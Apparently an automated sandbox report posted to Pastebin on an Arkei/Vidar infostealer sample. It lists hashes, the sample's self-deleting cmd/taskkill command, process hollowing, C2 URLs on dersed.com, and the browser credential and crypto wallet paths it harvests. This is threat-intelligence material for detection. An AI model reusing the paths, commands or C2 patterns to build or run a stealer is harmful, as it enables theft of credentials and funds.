API tools faq
paste
Advertisement
paladin316

1272Exes_105f94e56d5fc9fc7555aef13e0af78e_exe_2019-09-06_18_30.txt

paladin316
Sep 6th, 2019
1,655
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 47.09 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 1272
  3. * MalFamily: "Arkei"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_105f94e56d5fc9fc7555aef13e0af78e.exe"
  8. * File Size: 722944
  9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  10. * SHA256: "caec69a18e91839c1a46c79c6b55e68e14ba32ec2f2642a375870f958846fc66"
  11. * MD5: "105f94e56d5fc9fc7555aef13e0af78e"
  12. * SHA1: "3bc068404a65522272c36b64cceb2adcabb04fb6"
  13. * SHA512: "4e9136ad3b3b5b4090668ef66e455fc24e5813789a858018022398a84f018f8d7f41573933c3aecda7689926a4d61a1a1494bc5ed81805fb5848757960e777ae"
  14. * CRC32: "BF36EC09"
  15. * SSDEEP: "12288:RkOEBVhr1go+yrFYnldnYBxXNRKuEBzhUEVNjHZ7BOXO3v9tq5o:RkOEBaozrFYns6/5/JBOWv9I"
  16.  
  17. * Process Execution:
  18. "gK19ixrobtPtI0.exe",
  19. "gK19ixrobtPtI0.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "WmiPrvSE.exe",
  26. "svchost.exe"
  27.  
  28.  
  29. * Executed Commands:
  30. "\"C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe\"",
  31. "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit",
  32. "C:\\Windows\\System32\\cmd.exe /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit",
  33. "C:\\Windows\\system32\\lsass.exe",
  34. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  35. "taskkill /im gK19ixrobtPtI0.exe /f"
  36.  
  37.  
  38. * Signatures Detected:
  39.  
  40. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  41. "Details":
  42.  
  43.  
  44. "Description": "Behavioural detection: Executable code extraction",
  45. "Details":
  46.  
  47.  
  48. "Description": "Anomalous file deletion behavior detected (10+)",
  49. "Details":
  50.  
  51. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2172.32295765"
  52.  
  53.  
  54. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2172.32295765"
  55.  
  56.  
  57. "DeletedFile": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2172.32295781"
  58.  
  59.  
  60. "DeletedFile": "C:\\ProgramData\\freebl3.dll"
  61.  
  62.  
  63. "DeletedFile": "C:\\ProgramData\\mozglue.dll"
  64.  
  65.  
  66. "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
  67.  
  68.  
  69. "DeletedFile": "C:\\ProgramData\\nss3.dll"
  70.  
  71.  
  72. "DeletedFile": "C:\\ProgramData\\softokn3.dll"
  73.  
  74.  
  75. "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
  76.  
  77.  
  78. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill\\Google Chrome_Default.txt"
  79.  
  80.  
  81. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill"
  82.  
  83.  
  84. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC\\Google Chrome_Default.txt"
  85.  
  86.  
  87. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC"
  88.  
  89.  
  90. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt"
  91.  
  92.  
  93. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt"
  94.  
  95.  
  96. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt"
  97.  
  98.  
  99. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies"
  100.  
  101.  
  102. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\cookie_list.txt"
  103.  
  104.  
  105. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads\\Google Chrome_Default.txt"
  106.  
  107.  
  108. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads"
  109.  
  110.  
  111. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History\\Google Chrome_Default.txt"
  112.  
  113.  
  114. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History"
  115.  
  116.  
  117. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\information.txt"
  118.  
  119.  
  120. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\passwords.txt"
  121.  
  122.  
  123. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\screenshot.jpg"
  124.  
  125.  
  126. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft\\Authy"
  127.  
  128.  
  129. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft"
  130.  
  131.  
  132. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin"
  133.  
  134.  
  135. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin"
  136.  
  137.  
  138. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin"
  139.  
  140.  
  141. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DashCore"
  142.  
  143.  
  144. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin"
  145.  
  146.  
  147. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin"
  148.  
  149.  
  150. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectronCash"
  151.  
  152.  
  153. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum"
  154.  
  155.  
  156. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectrumLTC"
  157.  
  158.  
  159. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Ethereum"
  160.  
  161.  
  162. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus"
  163.  
  164.  
  165. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin"
  166.  
  167.  
  168. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko"
  169.  
  170.  
  171. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin"
  172.  
  173.  
  174. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\GoldCoinGLD"
  175.  
  176.  
  177. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin"
  178.  
  179.  
  180. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IOCoin"
  181.  
  182.  
  183. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin"
  184.  
  185.  
  186. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\JAXX"
  187.  
  188.  
  189. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin"
  190.  
  191.  
  192. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin"
  193.  
  194.  
  195. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin"
  196.  
  197.  
  198. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MultiDoge"
  199.  
  200.  
  201. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin"
  202.  
  203.  
  204. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin"
  205.  
  206.  
  207. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin"
  208.  
  209.  
  210. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin"
  211.  
  212.  
  213. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Zcash"
  214.  
  215.  
  216. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets"
  217.  
  218.  
  219. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\US_00000000-0000-0000-0000-0000000000001449353492.zip"
  220.  
  221.  
  222. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe"
  223.  
  224.  
  225.  
  226.  
  227. "Description": "Guard pages use detected - possible anti-debugging.",
  228. "Details":
  229.  
  230.  
  231. "Description": "Performs HTTP requests potentially not found in PCAP.",
  232. "Details":
  233.  
  234. "url_ioc": "dersed.com:80//288"
  235.  
  236.  
  237. "url_ioc": "dersed.com:80//freebl3.dll"
  238.  
  239.  
  240. "url_ioc": "dersed.com:80//mozglue.dll"
  241.  
  242.  
  243. "url_ioc": "dersed.com:80//msvcp140.dll"
  244.  
  245.  
  246. "url_ioc": "dersed.com:80//nss3.dll"
  247.  
  248.  
  249. "url_ioc": "dersed.com:80//softokn3.dll"
  250.  
  251.  
  252. "url_ioc": "dersed.com:80//vcruntime140.dll"
  253.  
  254.  
  255. "url_ioc": "ip-api.com:80//line/"
  256.  
  257.  
  258.  
  259.  
  260. "Description": "A process created a hidden window",
  261. "Details":
  262.  
  263. "Process": "gK19ixrobtPtI0.exe -> C:\\Windows\\System32\\cmd.exe"
  264.  
  265.  
  266.  
  267.  
  268. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  269. "Details":
  270.  
  271. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  272.  
  273.  
  274. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  275.  
  276.  
  277. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  278.  
  279.  
  280. "suspicious_request_iocs": "http://dersed.com/288"
  281.  
  282.  
  283. "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
  284.  
  285.  
  286. "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
  287.  
  288.  
  289. "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
  290.  
  291.  
  292. "suspicious_request_iocs": "http://dersed.com/nss3.dll"
  293.  
  294.  
  295. "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
  296.  
  297.  
  298. "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
  299.  
  300.  
  301. "suspicious_request_iocs": "http://ip-api.com/line/"
  302.  
  303.  
  304. "suspicious_request_iocs": "http://dersed.com/"
  305.  
  306.  
  307.  
  308.  
  309. "Description": "Performs some HTTP requests",
  310. "Details":
  311.  
  312. "url_iocs": "http://dersed.com/288"
  313.  
  314.  
  315. "url_iocs": "http://dersed.com/freebl3.dll"
  316.  
  317.  
  318. "url_iocs": "http://dersed.com/mozglue.dll"
  319.  
  320.  
  321. "url_iocs": "http://dersed.com/msvcp140.dll"
  322.  
  323.  
  324. "url_iocs": "http://dersed.com/nss3.dll"
  325.  
  326.  
  327. "url_iocs": "http://dersed.com/softokn3.dll"
  328.  
  329.  
  330. "url_iocs": "http://dersed.com/vcruntime140.dll"
  331.  
  332.  
  333. "url_iocs": "http://ip-api.com/line/"
  334.  
  335.  
  336. "url_iocs": "http://dersed.com/"
  337.  
  338.  
  339.  
  340.  
  341. "Description": "The binary likely contains encrypted or compressed data.",
  342. "Details":
  343.  
  344. "section": "name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x000afc00, virtual_size: 0x000afa54"
  345.  
  346.  
  347.  
  348.  
  349. "Description": "Uses Windows utilities for basic functionality",
  350. "Details":
  351.  
  352. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  353.  
  354.  
  355. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  356.  
  357.  
  358.  
  359.  
  360. "Description": "Behavioural detection: Injection (Process Hollowing)",
  361. "Details":
  362.  
  363. "Injection": "gK19ixrobtPtI0.exe(2172) -> gK19ixrobtPtI0.exe(2260)"
  364.  
  365.  
  366.  
  367.  
  368. "Description": "Executed a process and injected code into it, probably while unpacking",
  369. "Details":
  370.  
  371. "Injection": "gK19ixrobtPtI0.exe(2172) -> gK19ixrobtPtI0.exe(2260)"
  372.  
  373.  
  374.  
  375.  
  376. "Description": "Deletes its original binary from disk",
  377. "Details":
  378.  
  379.  
  380. "Description": "Behavioural detection: Injection (inter-process)",
  381. "Details":
  382.  
  383.  
  384. "Description": "Steals private information from local Internet browsers",
  385. "Details":
  386.  
  387. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt"
  388.  
  389.  
  390. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt"
  391.  
  392.  
  393. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt"
  394.  
  395.  
  396. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  397.  
  398.  
  399. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  400.  
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  403.  
  404.  
  405. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  406.  
  407.  
  408.  
  409.  
  410. "Description": "Collects information about installed applications",
  411. "Details":
  412.  
  413. "Program": "Google Update Helper"
  414.  
  415.  
  416. "Program": "Microsoft Excel MUI 2013"
  417.  
  418.  
  419. "Program": "Microsoft Outlook MUI 2013"
  420.  
  421.  
  422.  
  423.  
  424. "Program": "Google Chrome"
  425.  
  426.  
  427. "Program": "Adobe Flash Player 29 NPAPI"
  428.  
  429.  
  430. "Program": "Adobe Flash Player 29 ActiveX"
  431.  
  432.  
  433. "Program": "Microsoft DCF MUI 2013"
  434.  
  435.  
  436. "Program": "Microsoft Access MUI 2013"
  437.  
  438.  
  439. "Program": "Microsoft Office Proofing Tools 2013 - English"
  440.  
  441.  
  442. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  443.  
  444.  
  445. "Program": "Microsoft Publisher MUI 2013"
  446.  
  447.  
  448. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  449.  
  450.  
  451. "Program": "Microsoft Office Shared MUI 2013"
  452.  
  453.  
  454. "Program": "Microsoft Office OSM MUI 2013"
  455.  
  456.  
  457. "Program": "Microsoft InfoPath MUI 2013"
  458.  
  459.  
  460. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  461.  
  462.  
  463. "Program": "Microsoft Word MUI 2013"
  464.  
  465.  
  466. "Program": "Microsoft Groove MUI 2013"
  467.  
  468.  
  469.  
  470.  
  471. "Program": "Microsoft Access Setup Metadata MUI 2013"
  472.  
  473.  
  474. "Program": "Microsoft Office OSM UX MUI 2013"
  475.  
  476.  
  477. "Program": "Java Auto Updater"
  478.  
  479.  
  480. "Program": "Microsoft PowerPoint MUI 2013"
  481.  
  482.  
  483. "Program": "Microsoft Office Professional Plus 2013"
  484.  
  485.  
  486. "Program": "Adobe Refresh Manager"
  487.  
  488.  
  489. "Program": "Microsoft Office Proofing 2013"
  490.  
  491.  
  492. "Program": "Microsoft Lync MUI 2013"
  493.  
  494.  
  495.  
  496.  
  497. "Program": "Microsoft OneNote MUI 2013"
  498.  
  499.  
  500.  
  501.  
  502. "Description": "Stack pivoting was detected when using a critical API",
  503. "Details":
  504.  
  505. "process": "svchost.exe:672"
  506.  
  507.  
  508.  
  509.  
  510. "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
  511. "Details":
  512.  
  513. "MicroWorld-eScan": "Trojan.GenericKD.32387802"
  514.  
  515.  
  516. "FireEye": "Generic.mg.105f94e56d5fc9fc"
  517.  
  518.  
  519. "McAfee": "RDN/Generic.grp"
  520.  
  521.  
  522. "AegisLab": "Trojan.MSIL.Chapak.4!c"
  523.  
  524.  
  525. "K7AntiVirus": "Trojan ( 005573d61 )"
  526.  
  527.  
  528. "K7GW": "Trojan ( 005573d61 )"
  529.  
  530.  
  531. "Cybereason": "malicious.04a655"
  532.  
  533.  
  534. "Arcabit": "Trojan.Generic.D1EE32DA"
  535.  
  536.  
  537. "Invincea": "heuristic"
  538.  
  539.  
  540. "Symantec": "ML.Attribute.HighConfidence"
  541.  
  542.  
  543. "APEX": "Malicious"
  544.  
  545.  
  546. "Paloalto": "generic.ml"
  547.  
  548.  
  549. "Kaspersky": "HEUR:Trojan.MSIL.Chapak.gen"
  550.  
  551.  
  552. "BitDefender": "Trojan.GenericKD.32387802"
  553.  
  554.  
  555. "Avast": "Win32:Trojan-gen"
  556.  
  557.  
  558. "Ad-Aware": "Trojan.GenericKD.32387802"
  559.  
  560.  
  561. "Sophos": "Mal/Generic-S"
  562.  
  563.  
  564. "DrWeb": "Trojan.Inject3.20236"
  565.  
  566.  
  567. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.bc"
  568.  
  569.  
  570. "Emsisoft": "Trojan.GenericKD.32387802 (B)"
  571.  
  572.  
  573. "SentinelOne": "DFI - Malicious PE"
  574.  
  575.  
  576. "Microsoft": "Trojan:MSIL/CryptInject"
  577.  
  578.  
  579. "Endgame": "malicious (moderate confidence)"
  580.  
  581.  
  582. "ZoneAlarm": "HEUR:Trojan.MSIL.Chapak.gen"
  583.  
  584.  
  585. "GData": "Trojan.GenericKD.32387802"
  586.  
  587.  
  588. "Acronis": "suspicious"
  589.  
  590.  
  591. "MAX": "malware (ai score=100)"
  592.  
  593.  
  594. "Malwarebytes": "Spyware.Vidar"
  595.  
  596.  
  597. "ESET-NOD32": "a variant of Generik.LSRSOXR"
  598.  
  599.  
  600. "Ikarus": "Trojan.SuspectCRC"
  601.  
  602.  
  603. "MaxSecure": "Trojan.Malware.300983.susgen"
  604.  
  605.  
  606. "Fortinet": "MSIL/Malicious_Behavior.VEX"
  607.  
  608.  
  609. "Webroot": "W32.Trojan.Emotet"
  610.  
  611.  
  612. "AVG": "Win32:Trojan-gen"
  613.  
  614.  
  615. "Panda": "Trj/GdSda.A"
  616.  
  617.  
  618. "CrowdStrike": "win/malicious_confidence_100% (W)"
  619.  
  620.  
  621. "Qihoo-360": "Win32/Trojan.973"
  622.  
  623.  
  624.  
  625.  
  626. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  627. "Details":
  628.  
  629.  
  630. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  631. "Details":
  632.  
  633. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  634.  
  635.  
  636. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin\\\\x12"
  637.  
  638.  
  639. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin\\*.*"
  640.  
  641.  
  642. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
  643.  
  644.  
  645. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum\\\n"
  646.  
  647.  
  648. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  649.  
  650.  
  651. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  652.  
  653.  
  654. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum\\*.*"
  655.  
  656.  
  657. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  658.  
  659.  
  660. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin\\*.*"
  661.  
  662.  
  663. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin\\"
  664.  
  665.  
  666. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  667.  
  668.  
  669. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin\\*.*"
  670.  
  671.  
  672. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin\\"
  673.  
  674.  
  675. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  676.  
  677.  
  678. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  679.  
  680.  
  681. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  682.  
  683.  
  684. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin\\"
  685.  
  686.  
  687. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin\\*.*"
  688.  
  689.  
  690. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  691.  
  692.  
  693. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin\\*.*"
  694.  
  695.  
  696. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  697.  
  698.  
  699. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  700.  
  701.  
  702. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin\\"
  703.  
  704.  
  705. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  706.  
  707.  
  708. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin\\*.*"
  709.  
  710.  
  711. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  712.  
  713.  
  714. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin\\"
  715.  
  716.  
  717. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin\\"
  718.  
  719.  
  720. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  721.  
  722.  
  723. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  724.  
  725.  
  726. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin\\*.*"
  727.  
  728.  
  729. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  730.  
  731.  
  732. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko\\*.*"
  733.  
  734.  
  735. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko\\"
  736.  
  737.  
  738. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  739.  
  740.  
  741. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  742.  
  743.  
  744. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin\\"
  745.  
  746.  
  747. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin\\*.*"
  748.  
  749.  
  750. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  751.  
  752.  
  753. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin\\*.*"
  754.  
  755.  
  756. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  757.  
  758.  
  759. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  760.  
  761.  
  762. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin\\"
  763.  
  764.  
  765. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin\\"
  766.  
  767.  
  768. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  769.  
  770.  
  771. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin\\*.*"
  772.  
  773.  
  774. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  775.  
  776.  
  777. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin\\*.*"
  778.  
  779.  
  780. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  781.  
  782.  
  783. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  784.  
  785.  
  786. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin\\"
  787.  
  788.  
  789. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  790.  
  791.  
  792. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin\\"
  793.  
  794.  
  795. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin\\*.*"
  796.  
  797.  
  798. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  799.  
  800.  
  801. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  802.  
  803.  
  804. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin\\"
  805.  
  806.  
  807. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin\\*.*"
  808.  
  809.  
  810. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  811.  
  812.  
  813. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  814.  
  815.  
  816. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin\\"
  817.  
  818.  
  819. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin\\*.*"
  820.  
  821.  
  822. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  823.  
  824.  
  825. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  826.  
  827.  
  828. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  829.  
  830.  
  831. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  832.  
  833.  
  834. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  835.  
  836.  
  837. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin\\"
  838.  
  839.  
  840. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin\\*.*"
  841.  
  842.  
